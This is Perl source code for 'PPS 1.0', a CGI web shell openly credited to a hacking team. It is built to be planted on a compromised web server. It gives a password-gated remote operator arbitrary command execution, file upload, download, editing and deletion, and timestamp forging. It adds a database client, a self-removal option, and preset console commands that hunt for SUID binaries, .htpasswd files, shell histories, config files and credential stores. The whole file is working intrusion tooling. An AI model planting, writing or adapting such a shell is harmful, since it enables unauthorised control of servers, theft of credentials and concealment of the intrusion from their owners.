#!/usr/bin/perl
#################################################################################
#PPS 1.0 - Perl-cgi web shell by Pashkela [BugTrack Team] © 2010               
use Digest::MD5 qw(md5_hex);
$Password = "63a9f0ea7bb98050796b649e85481845";# - root [md5]
$WinNT = 0; # *nix=0,win=1
$CommandTimeoutDuration = 10;# max time of command execution in console in seconds
##################################################################################
$NTCmdSep = "&";
$UnixCmdSep = ";";
$ShowDynamicOutput = 1;
$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);$CmdPwd = ($WinNT ? "cd" : "pwd");$PathSep = ($WinNT ? "\\" : "/");$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");$LogFlag = false;use File::Basename;
use MIME::Base64;sub cod($){my $url =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;$url=encode_base64($_[0]);return $url;}
sub dec($){ my $url1=decode_base64($_[0]);return $url1;}sub ReadParse {local (*in) = @_ if @_;local ($i, $loc, $key, $val);$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;if($ENV{'REQUEST_METHOD'} eq "GET"){$in = $ENV{'QUERY_STRING'};}elsif($ENV{'REQUEST_METHOD'} eq "POST"){binmode(STDIN) if $MultipartFormData & $WinNT;read(STDIN, $in, $ENV{'CONTENT_LENGTH'});}if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/){$Boundary = '--'.$1; @list = split(/$Boundary/, $in); $HeaderBody = $list[1]; $HeaderBody =~ /\r\n\r\n|\n\n/;$Header = $`;$Body = $';$Body =~ s/\r\n$//;$in{'filedata'} = $Body;$Header =~ /filename=\"(.+)\"/;$in{'f'} = $1;$in{'f'} =~ s/\"//g;$in{'f'} =~ s/\s//g;for($i=2; $list[$i]; $i++){$list[$i] =~ s/^.+name=$//;$list[$i] =~ /\"(\w+)\"/;$key = $1;$val = $';$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;$val =~ s/%(..)/pack("c", hex($1))/ge;$in{$key} = $val;}}else{@in = split(/&/, $in);foreach $i (0 .. $#in){$in[$i] =~ s/\+/ /g;($key, $val) = split(/=/, $in[$i],2);$key =~ s/%(..)/pack("c", hex($1))/ge;$val =~ s/%(..)/pack("c", hex($1))/ge;$in{$key} .= "\0" if (defined($in{$key}));$in{$key} .= $val;}}}sub uname{$s="uname -a";$s.=" -U $q{u}" if($q{u});return $s;}sub hddall{$s='df -k /|sed 1d|awk "{total += \$2} {print total/1024/1024}"';$s.=" -U $q{u}" if($q{u});return $s;}sub hddfree{$s='df -k /|sed 1d|awk "{total += \$4} {print total/1024/1024}"';$s.=" -U $q{u}" if($q{u});return $s;}sub hddproc{$s='df -k /| sed 1d | awk "{total += \$5} {print 100-total}"';$s.=" -U $q{u}" if($q{u});return $s;}$hddall=hddall();$hddfree=hddfree();$hddproc=hddproc();sub PH{printf ("%.2f",(@_))};sub id{$s="id";$s.=" -U $q{u}" if($q{u});return $s;}
sub dir_list{my @list=();$CurrentDir=~s!\Q//!/!g;my $dir=$CurrentDir;@list=scan_dir($dir);$id=0;foreach $arg(@list) {$id++;$ii='d'.$id;my $name=fileparse($arg,@suffixlist);if (-d $arg){print '<tr class=l1><th class=chkbx><input type=checkbox class=chkbx></th><td><form method=POST name='.$ii.' action='.$ScriptLocation.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="cd '.$arg.'"><a href="javascript:document.'.$ii.'.submit()"><font face="Verdana" size="2">&nbsp;<b>[ '.$name.' ]</b></font></a></form></td><td>dir</td><td>'.mtime($arg).'</td>'.owner($arg).'<td><table><td><form name='.$ii.'rt method="POST" action="'.$ScriptLocation.'"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="RT"><input type="hidden" name="fdata" value='.cod(mtime($arg)).'><input type="hidden" name="fchmod" value='.perm($arg).'><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'rt.submit()">R T </a></form></td><td><form method=POST name='.$ii.'z action='.$ScriptLocation.'><input type=hidden name=zip value='.$name.'><input type=hidden name=arh_name value='.$ii.'z><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=zip><a href="javascript:document.'.$ii.'z.submit()">[zip]</a></form></td><td><form method=POST name='.$ii.'uz action='.$ScriptLocation.'><input type=hidden name=unzip_name value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=unzip><a href="javascript:document.'.$ii.'uz.submit()">[unzip]</a></form></td><td><form method=POST name='.$ii.'del action='.$ScriptLocation.'><input type=hidden name=del_dir value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=deldir><a href="javascript:document.'.$ii.'del.submit()">[<font color=#FF0000>x</font>]</a></form></td></table/></td></tr>';}else{$size1 = (stat $arg)[7]/1024;if ($size1<1000){$size = sprintf("%.2f",($size1))." KB";}else{$size = sprintf("%.2f",($size1/1024))." MB";}print '<tr class=l1><th class=chkbx><input type=checkbox class=chkbx></th><td><form name='.$ii.' method=post action='.$ScriptLocation.'><input type=hidden name=path id=view value='.$name.'><input type=hidden name=a value=view_file><input type=hidden name=d value='.$CurrentDir.'><a href="javascript:document.'.$ii.'.submit()"><font face="Verdana" size="2">&nbsp;'.$name.'</font></a></form></td><td>'.$size.'</td><td>'.mtime($arg).'</td>'.owner($arg).'<td><table><td><form name='.$ii.'rt method="POST" action="'.$ScriptLocation.'"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="RT"><input type="hidden" name="fdata" value='.cod(mtime($arg)).'><input type="hidden" name="fchmod" value='.perm($arg).'><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'rt.submit()">R T </a></form></td><td><form name='.$ii.'ed method=post action='.$ScriptLocation.'><input type=hidden name=path id=edit1_file value='.$name.'><input type=hidden name=a value=edit_file_path><input type=hidden name=d value='.$CurrentDir.'><a href="javascript:document.'.$ii.'ed.submit()">E </a></form></td><td><form name='.$ii.'d method="POST" action="'.$ScriptLocation.'"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="download"><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'d.submit()">D </a></form></td><td><form method=POST name='.$ii.'z action='.$ScriptLocation.'><input type=hidden name=zip value='.$name.'><input type=hidden name=arh_name value='.$ii.'z><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=zip><a href="javascript:document.'.$ii.'z.submit()">[zip]</a></form></td><td><form method=POST name='.$ii.'uz action='.$ScriptLocation.'><input type=hidden name=unzip_name value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=unzip><a href="javascript:document.'.$ii.'uz.submit()">[unzip]</a></form></td><td><form method=POST name='.$ii.'del action='.$ScriptLocation.'><input type=hidden name=del_file value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=delfile><a href="javascript:document.'.$ii.'del.submit()">[<font color=#FF0000>x</font>]</a></form></td></table></td></tr>';
}}print "</table>";sub perm($){my $mode=sprintf("%04o",((stat($_[0]))[2])&07777);return $mode;}sub owner($){my $uid=(stat $_[0])[4];my $user=(getpwuid $uid)[0];my $uid1=(stat $_[0])[5];my $group=(getgrgid $uid1)[0];my $mode=sprintf("%04o",((stat($_[0]))[2])&07777);if (!-r $_[0]){return '<td>'.$user.'/'.$group.'</td><td><font color=#FF0000>'.$mode.'</font></td>';}elsif(!-w $_[0]){return '<td>'.$user.'/'.$group.'</td><td><font color=#FFFFFF>'.$mode.'</font></td>';}else{return '<td>'.$user.'/'.$group.'</td><td><font color=#25ff00>'.$mode.'</font></td>';}}sub mtime($){my ($seconds, $minutes, $hours, $day, $month, $year, $wday, $yday,$isdst) = localtime((stat($_[0]))[9]);my $mmtime = ($year+1900).'-'.sprintf("%02d",($month+1)).'-'.sprintf("%02d",$day).' '.sprintf("%02d",$hours).':'.sprintf("%02d",$minutes).':'.sprintf("%02d",$seconds);return $mmtime;}sub scan_dir{my ($dir)=@_;my @dirs=();my @files=();my @list=();my @file=();for $file (glob($dir.'/.*')){if (-d $file && $file ne $dir.'/.'){push @dirs,$file;}if (-f $file){push @files,$file;}}for $file (glob($dir.'/*')){if (-d $file) {push @dirs,$file;}else{push @files,$file;}}@list=(@dirs,@files);return @list;}}sub HtmlSpecialChars($){my ($st)=@_;$st=~s|<|[<]|g;$st=~s|>|[>]|g;return $st;}sub DeHtmlSpecialChars($){my ($st)=@_;$st=~s|\[<\]|<|g;$st=~s|\[>\]|>|g;return $st;}$uname = uname();$idd = id();sub P{print @_}sub PrintPageHeader{print "Content-type: text/html\n\n";&GetCookies;$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;if ($LoggedIn != 1) {$Password = 0}$EncodedCurrentDir = $CurrentDir;
$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;print <<END;
<html><head><title>PPS 1.0</title>$HtmlMetaHeader<style>body{background-color:#444;color:#e1e1e1;}body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }table.info{ color:#fff;background-color:#222; }span,h1,a{ color: #df5 !important; }span{ font-weight: bolder; }h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }div.content{ padding: 5px;margin-left:5px;background-color:#333; }a{ text-decoration:none; }a:hover{ text-decoration:underline; }.ml1{ border:1px solid#444;padding:5px;margin:0;overflow: auto; }.bigarea{ width:100%;height:250px; }input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df5; font: 9pt Monospace,'Courier New'; }form{ margin:0px; }#toolsTbl{ text-align:center; }.toolsInp{ width: 300px }.main th{text-align:left;background-color:#5e5e5e;}.main tr:hover{background-color:#5e5e5e}.l1{background-color:#444}.l2{background-color:#333}pre{font-family:Courier,Monospace;}</style></head><body onLoad="document.checkbox.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0"><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Hdd:<br>DateTime:<br>Cwd:</span></td><td><nobr>
END
P("".`$uname`. "");print "</nobr><br>";P("". `$idd` . "");print "<br>";PH("".`$hddall`. "");print " GB <span>Free: </span>";PH("".`$hddfree`. "");print " GB [ ";P("". `$hddproc`);print "% ]";$time=localtime;print "<br>$time<table><td>";my $cwd="";
my @path = split("/", $CurrentDir);my $mode=sprintf("%04o",((stat($CurrentDir))[2])&07777); my $ss=0;print '<table cellpadding=0 cellspacing=0><td><form method=POST action='.$ScriptLocation.' name=cwd0><a href="javascript:document.cwd0.submit()">[..]&nbsp;</a><input type=hidden name=cc value="/"><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="changedir"></form></td>';foreach my $ar(@path){if($ar){$cwd .= "/".$ar;$ss++;print '<td><form method=POST action='.$ScriptLocation.' name=cwd'.$ss.'><a href="javascript:document.cwd'.$ss.'.submit()">/'.$ar.'</a><input type=hidden name=cc value='.$cwd.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="changedir"></form></td>';}}my $fw="<font face=Verdana size=2 color=#FFFFFF>";my $fe="</font>";print "</table>";sub cwdcol{if (!-r $CurrentDir){return '<font color=#FF0000>'.$mode.'</font>';}elsif(!-w $CurrentDir){return '<font color=#FFFFFF>'.$mode.'</font>';}else{return '<font color=#25ff00>'.$mode.'</font>';}}print "<td>".cwdcol()."</td><td><a href=$ScriptLocation> [ home ] </a></td></td></table>";
print <<END;
</td><td width=1 align=right><nobr><span>Server IP:</span><br>$ENV{'SERVER_ADDR'}<br><span>Client IP:</span><br>$ENV{'REMOTE_ADDR'}</nobr></td></tr></table><table width="100%" colspan="1" bgcolor="#222"><td><form method="POST" name=systeminfo action=$ScriptLocation><input type="hidden" name="a" value="systeminfo"><input type=hidden name=d value=$CurrentDir><a href="javascript:document.systeminfo.submit()">$fw [ $fe Sysinfo $fw ] $fe</a></form></td><td><form method=POST name=files action=$ScriptLocation><input type=hidden name=cc value=$CurrentDir><a href="javascript:document.files.submit()">$fw [ $fe Files $fw ] $fe</a><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="cd $CurrentDir"></form></td><td><form method="POST" name=consoler action=$ScriptLocation><input type="hidden" name="a" value="console"><input type="hidden" name="d" value=$CurrentDir><a href="javascript:document.consoler.submit()"> $fw [ $fe Console $fw ] $fe</a></form></td><td><form method="POST" name=sqlman action=$ScriptLocation><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="sql"><a href="javascript:document.sqlman.submit()">$fw [ $fe SQL $fw ] $fe</a></form></td><td><form method="POST" name=backconn action=$ScriptLocation><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="net"><a href="javascript:document.backconn.submit()">$fw [ $fe Network $fw ] $fe</a></form></td><td><form method="POST" name=evalc action=$ScriptLocation><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="code"><a href="javascript:document.evalc.submit()">$fw [ $fe Code $fw ] $fe</a></form></td><td><form method="POST" name=logout action=$ScriptLocation><input type="hidden" name="a" value="logout"><a href="javascript:document.logout.submit()">$fw [ $fe Logout $fw ] $fe</a></form></td><td><form method="POST" name=remove action=$ScriptLocation><input type="hidden" name="a" value="remove"><a href="javascript:document.remove.submit()">$fw [ $fe Self remove $fw ] $fe</a></form></td></table></tr></table><font color="#C0C0C0" size="2">
END
}
sub PrintLoginForm{print <<END;
<form name="f" method="POST" action="$ScriptLocation" align="center"><input type="password" name="p"><input type="submit" value="Enter"></form>
END
}
sub PrintPageFooter{print "</font></body></html>";}sub GetCookies{@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});foreach $cookie(@httpcookies){($id, $val) = split(/=/, $cookie);$Cookies{$id} = $val;}}sub PerformLogout{print "Set-Cookie: SAVEDPWD=;\n";print "Content-type: text/html\n\n";&PrintLoginForm;}sub PerformLogin{if(md5_hex($LoginPassword) eq $Password){print "Set-Cookie: SAVEDPWD=".md5_hex($LoginPassword).";\n";&PrintPageHeader("c");file_header();&PrintCommandLineInputForm;&PrintPageFooter;}else{print "Content-type: text/html\n\n";&PrintLoginForm;}}sub FileManager{&PrintPageHeader("f");file_header();&PrintCommandLineInputForm;	&PrintPageFooter;}sub PrintCommandLineInputForm{$Prompt = $WinNT ? "$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";
dir_list();sub wr_cur {if (!-w $CurrentDir){print '<font color=#FF0000>[Not writable]</font>';}else{print '<font color=#25ff00>[Writeable]</font>';}}
print <<END;
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'><tr><td><form method=POST><span>Change dir:</span><br><input class=toolsInp type=text name=cc value=$CurrentDir><input type=submit value='>>'><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="changedir"></form></td><td><form method=POST action=$ScriptLocation><span>Read file:</span><br><input class='toolsInp' type=text name=path><input type=hidden name=a value=view_file><input type=hidden name=d value=$CurrentDir><input type=submit value='>>'></form></td></tr><tr><td><form method=POST action="$ScriptLocation"><span>Make dir:</span>
END
wr_cur();
print <<END;
<br><input class='toolsInp' type=text name=md><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="makedir"><input type=submit value='>>'></form></td><td><form method=POST action="$ScriptLocation"><span>Make file:</span>
END
wr_cur();
print <<END;
<br><input class='toolsInp' type=text name=mf><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="makefile"><input type=submit value='>>'></form></td></tr><tr><td><form name="ff" method="POST" action="$ScriptLocation"><span>Execute:</span><br><input type="hidden" name="a" value="command"><input type="hidden" name="d" value="$CurrentDir"><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
<td>
END
&PrintFileUploadForm;
print <<END;
</td></table>
END
}
sub PrintFileUploadForm{
print <<END;
<span>Upload file: </span>
END
wr_cur();
print <<END;
<br><form name="upload_file_form" enctype="multipart/form-data" method="POST" action="$ScriptLocation"><input type="file" name="f" class=toolsInp><input type="submit" value=">>"><input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="upload"></form>
END
}
sub ConsoleP{
print <<END;
<table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'><td><table class=info id=toolsTbl cellpadding=3 cellspacing=3 width=50%><tr><td><form name="run" method="POST" action="$ScriptLocation"><br><span>\$</span><input type="hidden" name="a" value="command1"><input type="hidden" name="d" value="$CurrentDir"><input type=text class=toolsInp name=c value=''><input type=submit value=">>"></form></td></tr><tr><tr><td><form name="alias" method="POST" action="$ScriptLocation"><br><span>\$</span><input type="hidden" name="a" value="command1"><input type="hidden" name="d" value="$CurrentDir"><select name=aliases class=toolsInp><option value="ls -lha">List dir</option><option value="lsattr -va">list file attributes on a Linux second extended file system</option><option value="netstat -an | grep -i listen">show opened ports</option><option value="ps aux">process status</option><optgroup label="-Find-"></optgroup><option value="find / -type f -perm -04000 -ls">find all suid files</option><option value="find . -type f -perm -04000 -ls">find suid files in current dir</option><option value="find / -type f -perm -02000 -ls">find all sgid files</option><option value="find . -type f -perm -02000 -ls">find sgid files in current dir</option><option value="find / -type f -name config.inc.php">find config.inc.php files</option><option value="find / -type f -name &quot;config*&quot;">find config* files</option><option value="find . -type f -name &quot;config*&quot;">find config* files in current dir</option><option value="find / -perm -2 -ls">find all writable folders and files</option><option value="find . -perm -2 -ls">find all writable folders and files in current dir</option><option value="find / -type f -name service.pwd">find all service.pwd files</option><option value="find . -type f -name service.pwd">find service.pwd files in current dir</option><option value="find / -type f -name .htpasswd">find all .htpasswd files</option><option value="find . -type f -name .htpasswd">find .htpasswd files in current dir</option><option value="find / -type f -name .bash_history">find all .bash_history files</option><option value="find . -type f -name .bash_history">find .bash_history files in current dir</option><option value="find / -type f -name .fetchmailrc">find all .fetchmailrc files</option><option value="find . -type f -name .fetchmailrc">find .fetchmailrc files in current dir</option><optgroup label="-Locate-"></optgroup><option value="locate httpd.conf">locate httpd.conf files</option><option value="locate vhosts.conf">locate vhosts.conf files</option><option value="locate proftpd.conf">locate proftpd.conf files</option><option value="locate psybnc.conf">locate psybnc.conf files</option><option value="locate my.conf">locate my.conf files</option><option value="locate admin.php">locate admin.php files</option><option value="locate cfg.php">locate cfg.php files</option><option value="locate conf.php">locate conf.php files</option><option value="locate config.dat">locate config.dat files</option><option value="locate config.php">locate config.php files</option><option value="locate config.inc">locate config.inc files</option><option value="locate config.inc.php">locate config.inc.php</option><option value="locate config.default.php">locate config.default.php files</option><option value="locate config">locate config* files </option><option value="locate '.conf'">locate .conf files</option><option value="locate '.pwd'">locate .pwd files</option><option value="locate '.sql'">locate .sql files</option><option value="locate '.htpasswd'">locate .htpasswd files</option><option value="locate '.bash_history'">locate .bash_history files</option><option value="locate '.mysql_history'">locate .mysql_history files</option><option value="locate '.fetchmailrc'">locate .fetchmailrc files</option><option value="locate backup">locate backup files</option><option value="locate dump">locate dump files</option><option value="locate priv">locate priv files</option></select><input type=submit value='>>'></form></td></tr></table></td></table>
END
}
sub RTP{my $path=$CurrentDir."/".$TransferFile;print "Path: $path";$Fdata = dec($Fdata);
print <<END;
<table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'><td><table cellpadding=3 cellspacing=3 width=50%><tr><td><form name="run" method="POST" action="$ScriptLocation"><input type="hidden" name="a" value="command"><input type="hidden" name="d" value="$CurrentDir"><input type=hidden name=c value=rename_file><input type=hidden name=path value=$path><input type=text size=20 name=rename_file value=$TransferFile><input type=submit value='RENAME'></form></td><tr><td><form name="run" method="POST" action="$ScriptLocation"><input type="hidden" name="a" value="command"><input type="hidden" name="d" value="$CurrentDir"><input type=hidden name=c value=touch_file><input type=hidden name=path value=$path><input type=text size=20 name=touch_file value="$Fdata"><input type=submit value='TOUCH '></form></td><tr><td><form name="run" method="POST" action="$ScriptLocation"><input type="hidden" name="a" value="command"><input type="hidden" name="d" value="$CurrentDir"><input type=text size=20 name=chmod value=$Fchmod><input type=hidden name=path value=$path><input type=hidden name=c value=chmod_file><input type=submit value='CHMOD '></form></td></tr><tr><td><form name="run" method="POST" action="$ScriptLocation"><input type="hidden" name="a" value="view_file"><input type="hidden" name="d" value="$CurrentDir"><input type=hidden name=path value=$TransferFile><input type=submit value='VIEW'></form></td></tr><tr><td><form name="run" method="POST" action="$ScriptLocation"><input type="hidden" name="a" value="edit_file_path"><input type="hidden" name="d" value="$CurrentDir"><input type=hidden name=path value=$TransferFile><input type=submit value='EDIT'></form></td></tr></table></td></table>
END
}
sub RT{&PrintPageHeader;print "<h1>File operations:</h1>";RTP();&PrintPageFooter;}
sub Console{&PrintPageHeader;print "<h1>Console:</h1>";P("". `$idd` . "");ConsoleP();&PrintPageFooter;}
sub CommandTimeout{if(!$WinNT){alarm(0);
print <<END;
</xmp>Command exceeded maximum time of $CommandTimeoutDuration second(s).<br>Killed it!
END
ConsoleP();exit;}}
sub file_header {
 print <<END;
 <h1>File manager</h1><table width=100% class=main cellspacing=0 cellpadding=0><tr><th width='13px'><input type=checkbox class=chkbx></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>
END
}
sub ExecuteCommand1{if($RunCommand =~ m/^\s*cd\s+(.+)/){$CurrentDir=~s!\Q//!/!g;$OldDir=$CurrentDir;$Command="cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir=`$Command`);&PrintPageHeader("c");print "<h1>Console:</h1>";print "<font size=2>";$Prompt = $WinNT ? "$OldDir> " : "[$ServerName $OldDir]\$ ";print "$Prompt $RunCommand";}else{&PrintPageHeader("c");print "<h1>Console:</h1>";print "<font size=2>";$Prompt = $WinNT ? "$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";print "$Prompt $RunCommand<pre>";$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;if(!$WinNT){$SIG{'ALRM'}=\&CommandTimeout;alarm($CommandTimeoutDuration);}if($ShowDynamicOutput){$|=1;$Command .= " |";open(CommandOutput, $Command);	while(<CommandOutput>){$_ =~ s/(\n|\r\n)$//;print "$_\n";}$|=0;}else{print `$Command`;}if(!$WinNT){alarm(0);}print "</pre>";}print "</font>";ConsoleP();&PrintPageFooter;}sub ExecuteCommand{my $path=$in{'path'};$CurrentDir=$in{'d'};$CurrentDir=~s!\Q//!/!g;
if($RunCommand eq "changedir"){$RunCommand="cd $ChangeDir";}elsif($RunCommand eq "makedir"){$RunCommand="mkdir $MkDir";}elsif($RunCommand eq "makefile"){$RunCommand="touch $MakeFile";}elsif($RunCommand eq "zip"){$RunCommand="tar cfz ".$ZipArch.".tar.gz ".$ZipFile;}elsif($RunCommand eq "unzip"){$RunCommand = "tar xfz ".$UnZipArch;}elsif($RunCommand eq "delfile"){$RunCommand="rm ".$DelFile;}elsif($RunCommand eq "deldir"){$RunCommand = "rm -rf ".$DelDir;}elsif($RunCommand eq "chmod_file"){my $tempt=$in{'chmod'};$RunCommand="chmod $tempt $path";}elsif($RunCommand eq "rename_file"){my $rtempt=$in{'rename_file'};$RunCommand="mv $path $CurrentDir/$rtempt";}elsif($RunCommand eq "touch_file"){my $ttempt=$in{'touch_file'};$ttempt=~s!\Q-!!g;$ttempt=~s!\Q:!!g;$ttempt=~s/ //g;my $ar=substr($ttempt,12);my $al=substr($ttempt,0,12);$ttempt=$al.".".$ar;$RunCommand = "touch -t $ttempt $path";}if($RunCommand =~ m/^\s*cd\s+(.+)/){$OldDir = $CurrentDir;$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir = `$Command`);&PrintPageHeader("c");file_header();print "<font size=1>";$Prompt = $WinNT ? "$OldDir> " : "[$ServerName $OldDir]\$ ";print "$Prompt $RunCommand";}else{&PrintPageHeader("c");file_header();print "<font size=1>";$Prompt = $WinNT ? "$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";print "$Prompt $RunCommand<pre>";$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;if(!$WinNT){$SIG{'ALRM'} = \&CommandTimeout;alarm($CommandTimeoutDuration);}if($ShowDynamicOutput){$|=1;$Command .= " |";open(CommandOutput, $Command);while(<CommandOutput>){$_ =~ s/(\n|\r\n)$//;print "$_\n";}$|=0;}else{	print `$Command`;}if(!$WinNT){alarm(0);}print "</pre>";}print "</font>";&PrintCommandLineInputForm;&PrintPageFooter;}sub PrintDownloadLinkPage{local($FileUrl) = @_;if(-e $FileUrl){$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";&PrintPageHeader("c");file_header();
print <<END;
<code><font size=1>Download File $TransferFile...</font><br></code>
END
&PrintCommandLineInputForm;&PrintPageFooter;}else{&PrintPageHeader("f");file_header();print "<code>Failed to download $FileUrl: $!</code>";&PrintFileDownloadForm;&PrintPageFooter;}}sub SendFileToBrowser{local($SendFile) = @_;if(open(SENDFILE, $SendFile)){if($WinNT){binmode(SENDFILE);binmode(STDOUT);}$FileSize = (stat($SendFile))[7];($Filename = $SendFile) =~  m!([^/^\\]*)$!;print "Content-Type: application/x-unknown\n";print "Content-Length: $FileSize\n";print "Content-Disposition: attachment; filename=$1\n\n";print while(<SENDFILE>);close(SENDFILE);}else{&PrintPageHeader("f");file_header();print "<code>Failed to download $SendFile: $!</code>";&PrintCommandLineInputForm;&PrintFileDownloadForm;&PrintPageFooter;}}sub BeginDownload{if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))){$TargetFile = $TransferFile;}else{chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;$TargetFile .= $PathSep.$TransferFile;}if($Options eq "go"){&SendFileToBrowser($TargetFile);}else{	&PrintDownloadLinkPage($TargetFile);}}sub SystemInfo{sub langs {$s = "which gcc;which perl;which python;which php;which tar;which zip";$s.=" -U $q{u}" if($q{u}); return $s;}sub hdd {$s = "df -h";$s.=" -U $q{u}" if($q{u});return $s;}sub perlv {$s = "perl -v";$s.=" -U $q{u}" if($q{u});return $s;}sub hosts {$s = "cat /etc/hosts";$s.=" -U $q{u}" if($q{u});return $s;}sub downloaders {$s = "which lynx;which links;which wget;which GET;which fetch;which curl";$s.=" -U $q{u}" if($q{u});return $s;}sub httpd {$s = "locate httpd.conf";$s.=" -U $q{u}" if($q{u});return $s;}$langs = langs();$httpd = httpd();$hdd = hdd();$perlv = perlv();$hosts = hosts();$downloaders = downloaders();&PrintPageHeader("c");print "<h1>System information</h1>";print '<font face="Verdana" size="1">';print "<b>Paths:</b>";P("<pre><font color='#E6DED8'>". `$langs`. "</font></pre>");print "<b>Downloaders:</b>";P("<pre><font color='#E6DED8'>". `$downloaders`. "</font></pre>");print "<b>httpd.conf:</b>";P("<pre><font color='#E6DED8'>". `$httpd`. "</font></pre>");print "<b>HDD:</b>";P("<pre><font color='#E6DED8'>". `$hdd`. "</font></pre>");print "<b>Perl version:</b>";P("<pre><font color='#E6DED8'>". `$perlv`. "</font></pre>");print "<b>/etc/hosts:</b>";P("<pre><font color='#E6DED8'>". `$hosts`. "</font></pre>");print '</font>';&PrintPageFooter;}sub sql_loginform{print "<h1>DataBases manager</h1>";&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};if (!$hhost){$hhost='localhost'};if (!$pport){$pport='3306'};if (!$usser){$usser='root'};
print <<END;
<form name='sf' method='post' action="$ScriptLocation"><table cellpadding='2' cellspacing='0'><tr><td>Type</td><td>Host</td><td>Port</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr><td><select name='type' id='nname'><option value='mysql' selected>MySql</option><option value='pgsql' >PostgreSql</option></select></td><td><input type=text name=sql_host value=$hhost></td><td><input type=text name=sql_port value=$pport></td><td><input type=text name=sql_login value=$usser></td><td><input type=text name=sql_pass value=$passs></td><td><input type=text name=sql_db value=$dbb></td><input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="sql_connect"><td><input type=submit value='>>'></td></tr></table></form><br><script>document.getElementById('nname').focus();</script>
END
}
sub sql{use DBI;&PrintPageHeader("p");sql_loginform();sql_query_form();&PrintPageFooter;}sub sql_vars_set{$hhost=$in{'sql_host'};$pport=$in{'sql_port'};$usser=$in{'sql_login'};$passs=$in{'sql_pass'};$dbb=$in{'sql_db'};}sub sql_query_form{
 print <<END;
<form name='querys' method='post' action="$ScriptLocation"><textarea name='query' style='width:100%;height:60px'></textarea><br/>
<input type=submit value='Query'>  <input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="sql_query"></form>
END
}
sub sql_cq_form {
print <<END;
<table><td><span>Get data from columns:</span></td><td><form name='cquerys' method='post' action="$ScriptLocation"><textarea name='cquery' id='cquery' cols=40 style='width:100%;height:60px'></textarea><br/><input type="hidden" name="a" value="sql_query">
  <input type="hidden" name="d" value="$CurrentDir"><input type=submit value='Query'></form></td></table>
END
}
